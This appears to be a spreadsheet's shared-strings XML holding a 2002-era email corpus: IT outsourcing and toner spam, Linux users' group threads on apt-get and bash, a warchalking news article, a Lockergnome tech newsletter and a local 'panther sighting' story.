    <t xml:space="preserve">This is a multi-part message in MIME format.
 --NS_MAIL_Boundary_07132002
 Content-Type: text/html
 &lt;html&gt;&lt;head&gt;&lt;title&gt;&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
 .txt { font-family: Arial, Helvetica, sans-serif; font-size: 8pt}
 .orng { font-family: Arial, Helvetica, sans-serif; font-size: 12pt; color:
 #FF3300; font-weight: bold}
 .red { font-family: Arial, Helvetica, sans-serif; font-size: 8pt;
 font-weight: bold; color: #006699}
 .wh { font-family: Arial, Helvetica, sans-serif; font-size: 10pt;
 font-weight: bold; color: #ffffff}
 .gr { font-family: Arial, Helvetica, sans-serif; font-size: 8pt;
 font-weight: bold; color: #666666}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#99CCFF" leftmargin="0" topmargin="10" marginwidth="0"
 marginheight="0"&gt;
 &lt;table width="600" border="0" cellspacing="2" cellpadding="5"
 align="center" bgcolor="#336699"&gt;
   &lt;tr valign="top"&gt; 
     &lt;td bgcolor="#FFFFFF" rowspan="2"&gt; 
       &lt;p class="txt"&gt;&lt;span class="red"&gt;Dear Sir or Madam,&lt;/span&gt;&lt;br&gt;
         &lt;br&gt;
         We are glad to deliver cutting-edge solutions to your IT challenges
 at 
         a quality that is equivalent or superior to that offered by
 domestic companies, 
         but at a fraction of the cost of domestic development.&lt;br&gt;
         &lt;br&gt;
         We represent a number of well-established companies staffed with
 over 
         1000 qualified developers with a record of successfully completing
 hundreds 
         of small and midsize projects and tens of wide-scale projects for
 Fortune 
         100 corporations.&lt;/p&gt;
       &lt;center&gt;
         &lt;span class=red&gt;From business analysis and consulting to web
 design, from 
         coding to testing and porting we provide a full cycle of IT
 services.&lt;br&gt;
         &lt;/span&gt; &lt;br&gt;
       &lt;/center&gt;
       &lt;p class=txt&gt;Working both on-site and offshore our specialists
 develop and 
         integrate&lt;/p&gt;
       &lt;ul class=red&gt;
         &lt;li&gt;Internet/Intranet/Extranet applications&lt;/li&gt;
         &lt;li&gt;Business applications&lt;/li&gt;
         &lt;li&gt;ERP, CRM systems&lt;/li&gt;
         &lt;li&gt; e-Business (B2B, B2C) solutions&lt;/li&gt;
         &lt;li&gt;Mobile and Wireless applications 
         &lt;li&gt;Desktop applications 
         &lt;li&gt;Data Warehouses 
         &lt;li&gt;Security and Cryptography systems 
       &lt;/ul&gt;
       &lt;p align="right"  class=red&gt;and more...&lt;/p&gt;
       &lt;p class=txt&gt;Our quality is based on developed partnerships with
 leading 
         IT technology providers, modern project and quality management and
 exclusive 
         human resources.&lt;/p&gt;
     &lt;/td&gt;
     &lt;td bgcolor="#FFFFFF"&gt; 
       &lt;p align="center"&gt;&lt;br&gt;
         &lt;span class="orng"&gt; Rates only $20 an hour!&lt;/span&gt;&lt;br&gt;
         &lt;br&gt;
         &lt;span class="txt"&gt;&lt;font size="2"&gt;For more info...&lt;b&gt;&lt;a
 href="mailto:Raymond2@btamail.net.cn,Mr6666@libero.it?subject=Please send more
 info!"&gt;CLICK HERE!!!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/span&gt;&lt;BR&gt;
 		&lt;FONT SIZE="-2"&gt;Please include your phone number,&lt;BR&gt;and we will be happy
 to call you!&lt;/FONT&gt;&lt;BR&gt;
       &lt;p align=center&gt;&lt;span class=orng&gt;&lt;font color="#000000"&gt;Or
 Call:&lt;/font&gt; 602-640-0095&lt;br&gt;
         &lt;br&gt;
         Cost effective IT solutions&lt;br&gt;
         Experienced teams of specialists&lt;br&gt;
         Fair rates&lt;/span&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr valign="top"&gt; 
     &lt;td bgcolor="#FFFFFF" valign="top"&gt; 
       &lt;p class="red"&gt;Here is a list of some of the technologies 
         and platforms that our specialists employ to bring you only the
 best, 
         most efficient and cost-effective solution:&lt;br&gt;
       &lt;/p&gt;
       &lt;table width="100%" border="0" cellspacing="1" cellpadding="2"
 class=txt&gt;
         &lt;tr valign="top" bgcolor="#FFFFFF"&gt; 
           &lt;td width="137"&gt; 
             &lt;p&gt;&lt;b&gt; Application Platforms&lt;br&gt;
               &lt;/b&gt; &lt;span class="gr"&gt;.: .Net&lt;br&gt;
               .: Java2EE&lt;br&gt;
               .: IBM WebSphere Suite&lt;br&gt;
               .: Lotus Domino&lt;br&gt;
               .: BEA WebLogic&lt;br&gt;
               .: ColdFusion&lt;br&gt;
               .: Enhydra&lt;/span&gt;&lt;/p&gt;
           &lt;/td&gt;
           &lt;td width="124"&gt; 
             &lt;center&gt;
               &lt;b&gt; Operating Systems&lt;br&gt;
               &lt;/b&gt;
             &lt;/center&gt;
             &lt;span class="gr"&gt;.: all Windows, Mac,&lt;br&gt;
             and Unix platforms&lt;br&gt;
             .: Epoc&lt;br&gt;
             .: Windows CE&lt;br&gt;
             .: Palm OS&lt;br&gt;
             .: Java2Microedition&lt;/span&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top" bgcolor="#FFFFFF"&gt; 
           &lt;td width="137"&gt;&lt;b&gt;Databases&lt;br&gt;
             &lt;/b&gt;&lt;span class="gr"&gt;.: MS SQL&lt;br&gt;
             .: Oracle&lt;br&gt;
             .: DB2&lt;br&gt;
             .: FoxPro&lt;br&gt;
             .: Informix&lt;br&gt;
             .: Sybase&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/td&gt;
           &lt;td width="124"&gt; 
             &lt;p&gt;&lt;b&gt; &lt;b class=txt&gt;Real time embedded systems&lt;br&gt;
               &lt;span class="gr"&gt;.: QNX 4RT&lt;br&gt;
               .: QNX Neutrio RT&lt;/span&gt;&lt;/b&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;p&gt;&amp;nbsp;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align="center"&gt;&lt;span class=orng&gt;&lt;i&gt;&lt;A
 HREF="mailto:Raymond2@btamail.net.cn,Mr6666@libero.it?subject=I would like a Free quote!"&gt;Free
 quotes!&lt;/a&gt;&lt;/i&gt;&lt;/span&gt;&lt;BR&gt;
 	  &lt;FONT SIZE="-2"&gt;Please include your phone number,&lt;BR&gt;and we will be
 happy to call you!&lt;/FONT&gt;&lt;BR&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr valign="middle" align="center"&gt; 
     &lt;td bgcolor="#6699CC" colspan="2"&gt;&lt;span class="txt"&gt;If you received
 this letter 
       by mistake please click &lt;A
 HREF="mailto:Remove-Please@btamail.net.cn?subject=Remove"&gt;Unsubscribe&lt;/a&gt;&lt;/span&gt; 
     &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;
 --NS_MAIL_Boundary_07132002--
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;It seems good Ol' Uncle Dave is once again trying to savage anyone that
 &gt;dares to disagree with him.  It seems Ben, Kevin and Bill are making too
 &gt;strong a case.  So here we Dave's attempt to fool you into thinking they're
 &gt;some sort of monsters, violent ones no less.
 &gt;
 &gt;Anyone who works with Hemenway or Kearney should be aware that these people
 &gt;are nothing less than monsters, who will stoop to any level to get their
 /me coughs... I'm part of the Monster club. They call me... Hemenway! &lt;g&gt;
 -- 
 Morbus Iff ( i assault your sensibilities! )
 Culture: http://www.disobey.com/ and http://www.gamegrene.com/
 Tech: http://www.oreillynet.com/pub/au/779 - articles and weblog
 icq: 2927491 / aim: akaMorbus / yahoo: morbus_iff / jabber.org: morbus
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: warchalking
</t>
  </si>
  <si>
    <t xml:space="preserve">Hobos in the depression used to use this technique to
 know if they could find a meal or a bed and how
 friendly the residents were to begging.  This showed
 up on sladhdot in June.  It'll be interesting to see
 what the parallel sign is for the Hobo sign
 that representing a meal or bed if threatened. Can
 you imagine threatening someone to get your wireless? 
 Another phenomenon is Internet connection sharing which is
 freely available on most modern OSs.  It's a very easy way to
 share a $6/24hour period wireless conneciton in the San Jose
 airport among dozens of your favorite friends.  
 http://news.bbc.co.uk/1/hi/technology/2197252.stm
 http://www.blackbeltjones.com/warchalking/warchalking0_9.pdf
   Friday, 16 August, 2002, 11:42 GMT 12:42 UK 
   FBI warns about wireless craze
   Some FBI agents are worried about warchalking
   Well-meaning wireless activists have caught the attention of the US Federal Bureau
   of Investigation. 
   One of its agents has issued a warning about the popular practice of using chalk marks
   to show the location of wireless networks. 
   The marks, or "warchalks", are cropping up in cities and suburbs across the world. 
   The FBI is now telling companies that, if they see the chalk marks outside their
   offices, they should check the security of wireless networks and ensure they remain
   closed to outsiders. 
   Top marks 
   The warchalking phenomena is only a couple of months old but it has generated a huge
   amount of interest. 
   The idea behind warchalking is to use a standardised set of symbols to mark the
   existence of wireless networks that anyone can use to go online. 
   Many community groups and local governments, and even some public-spirited
   companies, are setting up wireless nodes that give people fast net access. 
   This symbol denotes a closed wireless node 
   The wireless networks replace computer cables with radio and are usually very easy to
   set up and connect to. 
   Before now many curious hackers have gone on "wardriving" expeditions which
   involve them driving around an area logging the location of the wireless networks. 
   Many companies using wireless do not do enough to make them secure and stop people
   outside the organisation using them. 
   So the FBI is issuing advice to companies to be on the lookout for warchalk marks as a
   pointer to the security of their wireless network. 
   "If you notice these symbols at your place of business, it is likely your network has
   been identified publicly," warns the guidance from the FBI. 
   Scare stories? 
   The agent who circulated the warning in Pittsburgh said it was not an official FBI
   advisory or policy but was information worth passing on. 
   He urged anyone using a wireless network to ensure that it was secure and used only by
   those a company wants to access it. 
   Warchalkers have questioned the scare stories surrounding the phenomena, saying that
   anyone with malicious intent is unlikely to publicly mark their target. 
   The phrases "wardriving" and "warchalking" derive from the early days of computer
   hacking when curious users programmed their computers to search for all phone lines
   that returned data tones. The exhaustive searching was known as "wardialling".
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Tech Specialist]  Concrete Geekitude
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020722.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020722.html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&lt;/style&gt;&lt;title&gt;20020722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07.22.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;50 TIPS TO MAKE WINDOWS MORE USEFUL&lt;/b&gt; 
 Do you have to deal with Windows on a daily basis? Might as well 
 maximize your time with it. You'll find that some of these tips 
 will apply to other operating systems, too. The world of computing 
 isn't so mysterious once you understand how it works. With this 
 GnomeTome, you'll begin to work faster - and smarter. 
 &lt;a href="http://www.gnometomes.com/tome/000627.html"&gt;Download Windows Productivity Tips now&lt;/a&gt;!  
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I did a lot this weekend, but I didn't really get much done, 
 ya know? My knees are killing me from hauling stuff out of 
 the basement for storage up in the attic, but the pile only 
 made it as far as the kitchen. Then I stripped and painted 
 the floor where that collection of stuff was previously 
 stored, and erected some shelving so I'd have room for more 
 stuff. I woke up the next morning discover a very sick 
 ferret, likely from the fumes that leeched into the next 
 room over despite the ventilation I had setup to prevent the 
 migration of bad air. So, I ended up dismantling the ferret 
 cage to move it upstairs for a week or so until I'm sure 
 it's safe. Thankfully, all critters are doing well now.
 &lt;p&gt;I also started in on replacing the cheapo rusted screws 
 with stainless steel deck screws out back, but found that 
 the ones I picked up are too weak, leaving me with stripped 
 out heads and bent shafts. That project stopped after barely 
 getting started. The front steps are also in need of rust-
 proof screws, but they are made from much softer wood, so I 
 moved the tools to the other side of the house. Two-thirds 
 of the way through the first row, I found that the extra 
 1/2" on the screws I purchased was too much and I began 
 running into the top of the old concrete steps underneath. 
 Figures. Live and learn. 
 &lt;p&gt;Oh well, it was entirely too hot to work outside anyway. 
 Back down to the basement I went to geek out instead. 
 Roughly an hour into geekitude, I glanced over and realized 
 it was 78.7 degrees in the basement and I was virtually 
 stuck to my chair from the sweat. I shut off as much as I 
 really could and still work on a couple of projects, but it 
 didn't help the heat situation much. It was just too hot 
 outside for the air conditioner to keep up with the added 
 heat from the computers. That left me in need of a shower 
 and with only the notebook in the living room for the 
 balance of the weekend. I cleaned out a lot of ancient 
 email, which was nice, but nothing really got accomplished 
 otherwise. Boy, am I tired. And the weekend is so far away.
 &lt;p&gt;Hey, the second season of M*A*S*H comes out on DVD 
 tomorrow! That should put me in better spirits. I could 
 watch M*A*S*H for hours on end. In fact, I often do just 
 that. The only kink is that the episodes don't play back-to-back 
 from DVD. I'm going to play with AppleScript on the Mac 
 to see if I can customize how the individual discs play. In 
 theory, I should be able to make a disc play all the way 
 through. If I succeed, I'll be sure to share the script 
 technique in the &lt;a href="http://applecore.lockergnome.com/"&gt;AppleCore newsletter&lt;/a&gt;. Too bad I can't do that with a stand-alone DVD player.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&lt;b&gt;Slow File Save Dialog Boxes&lt;/b&gt;
 &lt;br&gt;Pointed out by Ian Hargreaves
 &lt;p&gt;&lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;en-us;q321126"&gt;http://support.microsoft.com/default.aspx?scid=kb;en-us;q321126&lt;/a&gt;
 &lt;p&gt;I've hated this one for a long time, and now we have a 
 hotfix and a workaround, so take your pick as to which will 
 work best. I often map drive letters to specific network 
 shares, and if I happen to have a system turned off, I'll 
 notice a significant delay when clicking the drop-down boxes 
 in Open, Look In or Save In/As dialog boxes. Windows 2000 
 attempts to reconnect to mapped resources before showing you 
 the list, and depending on how many drives you have mapped 
 and how many of those resources are unavailable, it can take 
 eons just to save a file. A workaround is to use the My 
 Network Places functionality instead of mapping drive 
 letters. Fine for some, but I prefer having drive letters 
 mapped for many things, being that I work at a command 
 prompt quite a bit, and it's easier to navigate that way. 
 Alternatively, a hotfix is now available, but you'll have to 
 contact Microsoft to obtain the fix if that's the route you 
 choose.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Customized 9x/ME Blue Screen Errors&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.vsres.com/blscrn/"&gt;http://www.vsres.com/blscrn/&lt;/a&gt;
 &lt;p&gt;We've all seen 'em. Those annoyingly incoherent blue 
 screens indicating a system error of some sort, but provide 
 no real help in solving the problem. If you're a programmer 
 that has had to deal with error conditions produced by 
 Windows 95/98/ME, then this might be a better way to handle 
 them within your applications. Blue Screen v1.21 is an 
 ActiveX control that uses the standard Windows system error 
 functions, but provides a way to pass along text and 
 response options you designate. Note that this is not 
 functional on Windows NT/2000/XP, which handle system errors 
 in an entirely different manner.
 &lt;p&gt;&lt;br&gt;&lt;b&gt;Gamers Beware of Intel 845G Chipset&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.theinquirer.net/?article=4532"&gt;http://www.theinquirer.net/?article=4532&lt;/a&gt;
 &lt;br&gt;&lt;a class="url" href="http://www.theinquirer.net/?article=4513"&gt;http://www.theinquirer.net/?article=4513&lt;/a&gt;
 &lt;p&gt;Discount the AMD hype and returned volley from Intel when 
 reading up on all of this, but one thing is painfully clear. 
 The Intel 845G chipset and P4 Celeron processors really 
 don't provide an acceptable gaming experience. Not only is 
 performance subject to ridicule, but compatibility is also 
 looking to be a serious matter. Intel has never claimed that 
 Celerons were high-end desktop processors, but they have 
 typically provided a decent enough experience that they can 
 make for acceptable machines for the more budget-minded 
 consumer. The compatibility issues with this particular 
 version of Celeron and the 845G chipset are something to 
 watch out for. Once the Celeron is moved to the .13 micron 
 core, I suspect the performance concern won't remain, but 
 the 845G alone seems to have it's own problems without 
 adding the Celeron misery. The lesson in knowing what 
 hardware you're buying is what's important here.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q296133"&gt;Q296133 - WD2002: Recorded Macro to Create Right-to-Left Style Records Paragraph Alignment Incorrectly (Q296133)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292152"&gt;Q292152 - WD2002: Macro to Modify Currently Selected Text Does Not Work Correctly (Q292152)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292150"&gt;Q292150 - WD2002: Undo Command Does Not Remove List Style Link to Paragraph Style (Q292150)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292094"&gt;Q292094 - WD2002: Error Message: Microsoft Mail Local Fax Is Not Installed on Your System (Q292094)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292078"&gt;Q292078 - WD2002: New Document Created by Macro While Word Is Minimized Opens in Restored State (Q292078)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;CLEAN YOUR SYSTEM&lt;/b&gt; Add/Remove Plus! 2002 offers a new and better way 
 to uninstall programs you no longer want on your computer. All you have to do 
 is double-click on a Desktop icon called "Uninstall Programs", quickly find 
 the program you want to uninstall and click a button. Add/Remove Plus! 2002, 
 unlike the standard Windows uninstall feature (the Control Panel Add/Remove 
 Programs applet), will uninstall the program and remove it from the list. 
 &lt;a href="http://www.SellShareware.com/ProgramInfo.asp?AfID=10519&amp;PrID=36034"&gt;Get Your Copy of Add/Remove Plus Now&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;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&lt;b&gt;Test Drive Compaq Servers&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.testdrive.compaq.com/"&gt;http://www.testdrive.compaq.com/&lt;/a&gt;
 &lt;p&gt;Compaq (Ok, HP) offers a set of servers running various 
 *nix operating systems, as well as Oracle 9i, for test 
 drive. Just register for an account and you can tinker 
 around with Linux, FreeBSD or even Tru64 Unix running on an 
 Alpha server, but without the hassle and expense of 
 obtaining your own toys. I love the idea of having a pre-
 configured environment that lets you kick the tires without 
 causing any permanent damage. 
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Too Cool&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.pcworld.com/news/article/0,aid,102779,00.asp"&gt;http://www.pcworld.com/news/article/0,aid,102779,00.asp&lt;/a&gt;
 &lt;p&gt;This was just too interesting not to mention. Water-cooled 
 systems are all-the-rage among overclockers and those 
 that seem to need bragging rights over their friends' computer 
 systems. Hitachi is taking a chapter from that tome and 
 applying the concept where it's truly needed - notebook 
 computers. Believe me when I say that these suckers get very 
 hot. I spend half my life with notebook planted on lap, and 
 I have to put something between the two surfaces to avoid my 
 own little heat stroke. Fans and the mini water cooling 
 system Hitachi is implementing provide roughly the same heat 
 mitigation efficiency, but without the noise. The concept of 
 a water-cooled notebook sounds a little odd, but I would 
 welcome the elimination of the turbine droning with open 
 arms.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href="http://www.lockergnome.com/issues/techspecialist/20020722.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020722.html&lt;/a&gt;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</si>
  <si>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Missing Fleet Week
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000230.html
 Date: 2002-10-09T22:10:38-08:00
 I'll be in Ohio this weekend for a family gathering, so I'll be missing Fleet 
 Week (Google can't find a good "official site"). Damn. I've wanted to see the 
 Blue Angles again. Wow, that site sucks. And Google couldn't find...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Plumstead Panther - Pictures!
</t>
  </si>
  <si>
    <t xml:space="preserve">Looks and sounds a hell of a lot like Clare's cat, Violence...
 A tall tail or is it a prowling panther?
 http://www.thisislocallondon.co.uk/news/weird/display.var.633939.Bizarre+London.0.html
 Security cameras at the Gardiner house filmed the cat
 The Plumstead panther has been spotted just yards from the scene of a 
 sighting made three weeks ago but this time it was caught on camera.
 Steve Gardiner, 41, claims to have spotted the large cat in his garden in 
 Upton Road, Plumstead, in the sixth reported sighting in Woolwich and Bexley 
 in just four weeks.
 Mr Gardiner told News Shopper he watched the big cat as it walked alongside 
 the house at about 7.15am, on Wednesday, September 25, while his security 
 cameras captured it on film.
 The father-of-four described the black cat as about 3ft long and 
 two-and-a-half-foot high, with a large body.
 He said: "It prowled past the patio doors moving with all the mannerisms of 
 a hunter.
 "It looked at me calmly before moving on."
 The bricklayer told how his work colleagues let him know News Shopper had 
 been following the big cat story so he decided to call our offices with news 
 of the sighting.
 His wife, Karen, 41, later checked the tape which had captured grainy images 
 of the large cat prowling through their garden.
 She said: "I feel sorry for it not living in its natural habitat I'd hate 
 for it to get hurt."
 Mr Gardiner told how he is convinced of the cat's existence saying how their 
 usually quiet 18-year-old dog barks at "nothing" in the garden but barked 
 that morning.
 He warned: "I don't think these cats are dangerous but, if cornered, they 
 might jump you."
 Sightings of the large black cat are being reported all over the Plumstead 
 Common and Shooters Hill as well at the Bexley area.
 If you have seen the big cat, call News Shopper on 01689 885712.
 12:27 Tuesday 8th October 2002
 _________________________________________________________________
 Send and receive Hotmail on your mobile device: http://mobile.msn.com
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home for Top $
 http://us.click.yahoo.com/RrPZMC/jTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,
 Tried 'apt-get clean' with same results.
 On Sat, 2002-02-02 at 06:08, Matthias Saou wrote:
 &gt; Once upon a time, Lance wrote :
 &gt; 
 &gt; &gt; I have failed dependencies in RPM database to I am unable to use
 &gt; &gt; apt-get.  I requests to run 'apt-get -f install' to fix these
 &gt; &gt; dependencies, however, I get these errors when running 'apt-get -f
 &gt; &gt; install' :
 &gt; [...]
 &gt; &gt; error: unpacking of archive failed on file
 &gt; &gt; /usr/share/libgcj.zip;3c5b5e75: cpio: MD5 sum mismatch
 &gt; &gt; E: Sub-process /bin/rpm returned an error code (1)
 &gt; &gt; [root@localhost root]# 
 &gt; 
 &gt; I'd say that the file apt downloaded is corrupted. Maybe trying "apt-get
 &gt; clean" to remove all downloaded files first would solve the problem.
 &gt; 
 &gt; Matthias
 &gt; 
 &gt; -- 
 &gt; Matthias Saou                                World Trade Center
 &gt; -------------                                Edificio Norte 4 Planta
 &gt; System and Network Engineer                  08039 Barcelona, Spain
 &gt; Electronic Group Interactive                 Phone : +34 936 00 23 23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</si>
  <si>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Subject: Re: [ILUG] weekend projects...
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 28 Jul 2002, kevin lyda wrote:
 &gt; 	    mod_gzip_item_include               file    \.htm$
 &gt; 	    mod_gzip_item_include               file    \.html$
 &gt; 	    mod_gzip_item_include               file    \.txt$
 &gt; 	    mod_gzip_item_include               file    \.php$
 &gt; 	    mod_gzip_item_include               file    \.php3$
 &gt; 	    mod_gzip_item_include               file    \.php4$
 &gt; 	    mod_gzip_item_include               file    \.pl$
 &gt; 	    mod_gzip_item_include               mime    text/.*
 &gt; 	    mod_gzip_item_include               mime    httpd/unix-directory
 &gt; 	    mod_gzip_item_include               handler ^perl-script$
 &gt; 	    mod_gzip_item_include               handler ^server-status$
 &gt; 	    mod_gzip_item_include               handler ^server-info$
 hmm.. add \.swf and \.class to list of files above that can do with
 compressing.
 regards,
 -- 
 Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
 Fortune:
 No matter whether th' constitution follows th' flag or not, th' supreme
 court follows th' iliction returns.
 		-- Mr. Dooley
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....               NOAZ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HR&gt;
 &lt;html&gt;
 &lt;div bgcolor=3D"#FFFFCC"&gt;
   &lt;p align=3D"center"&gt;&lt;a
 href=3D"http://www.webbasedmailing.com"&gt;&lt;img border=3D"0"
 src=3D"http://www.webbasedmailing.com/Toners2goLogo.jpg"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href=3D"http://www.webbasedmailing.com"&gt;Toners 2 Go
 &lt;/a&gt;is your secret
 weapon to lowering your cost for &lt;a
 href=3D"http://www.webbasedmailing.com"&gt;High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href=3D"http://www.webbasedmailing.com"&gt;Toners
 2 Go&lt;/a&gt;!
 &lt;/p&gt;
 &lt;hr&gt;
   request to be excluded by visiting &lt;a
 href=3D"http://www.webbasedmailing.com/datacenter.htm"&gt;HERE&lt;/a&gt;&lt;/span&gt;&lt;/fo=
 nt&gt;&lt;br&gt;
 &lt;/div&gt;
 &lt;/html&gt;
 beverley
</t>
  </si>
  <si>
    <t xml:space="preserve">Kevin O' Riordan's [kor@compsoc.com] 30 lines of wisdom included:
 &gt; 
 &gt; On Pungenday, the 9th day of Bureaucracy, Padraig Brady confessed:
 &gt; &gt; How can I repeat a string an arbitrary number
 &gt; &gt; of times in bash/sed/...
 &gt; &gt;
 &gt; &gt; I.E. I'm missing the repeat in the following:
 &gt; &gt;
 &gt; &gt; STRING="&gt; "
 &gt; &gt; NUMBER=3
 &gt; &gt; PREFIX=repeat $STRING $NUMBER
 &gt; &gt; echo $PREFIX
 &gt; &gt; &gt; &gt; &gt;
 &gt; 
 &gt; 
 &gt; perl ?
 &gt; 
 &gt;   STRING="&gt; "
 &gt;   NUMBER=3
 &gt;   PREFIX=`perl -e "print '$STRING' x $NUMBER;"`
 &gt;   echo $PREFIX
 &gt; 
 &gt; I'm pretty sure the bsd 'jot' utility can do this too, but I don't
 &gt; have it to hand.
 I didn't think that jot was installed on Linux systems by default,
 so from the tone of Padraigs mail that's not what he wanted,
 however, if I'm incorrect (don't have a Linux system to hand) the
 following is the syntax.
 jot -b "string" 3
 Phil.
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Dave wrote :
 &gt; Eeeek... I hope they aren't intending to release a new RH with a new gcc
 &gt; which hasn't yet been released (again). Bad enough the first time, and
 &gt; I'm sure it gave RedHat a lot of embarrassment.
 Not really, it should have given more embarrassment to sloppy C++
 programmers although they often were the ones bashing on gcc 2.96...
 &gt; FWIW, I've yet to compile apt on the gcc 3.2 snapshot in RawHide - apt's
 &gt; C++ makes several rather poor assumptions on what iterators are, and in
 &gt; addition doesn't use namespaces at all.
 &gt; 
 &gt; For non-C++ folk, this basically means it needs porting. I've got a
 &gt; reasonable way along, now, and I'll send a suitable patch to Connectiva
 &gt; or somewhere when I succeed - I can't find anything on Connectiva's site
 &gt; itself for this.
 There are already patches for this, look at the Conectiva apt-list
 archives, you should find them there. Also, apt 0.5 is being actively
 developed and already contains enough fixes to be compiled on Limbo with
 gcc 3.2.
 &gt; In addition, the rpmlib stuff has changed slightly - I've not really
 &gt; started on this, but it's mainly just arguments added. The rpmlib
 &gt; documentation seems somewhat poor, though, unless I've missed it.
 You can still use an apt package compiled on Red Hat Linux 7.3 as long as
 you install the "rpm404" package for compatibility. That's what I'm doing
 currently on my home Rawhide system.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</si>
  <si>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[ILUG] Using Normal IDE Device with a Dell Latitude CPx laptop
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 I've got an normal 3.5" CD-RW IDE drive that I'd like to be able to use with a
 Dell Latitude CPx laptop that I've got. Does anyone know any way to enable this,
 for example through the use of a special cable for the Modular Bay (where CD-ROM
 or floppy drive is normally).
 There is also the possibility of using a docking station, but Dell's docking
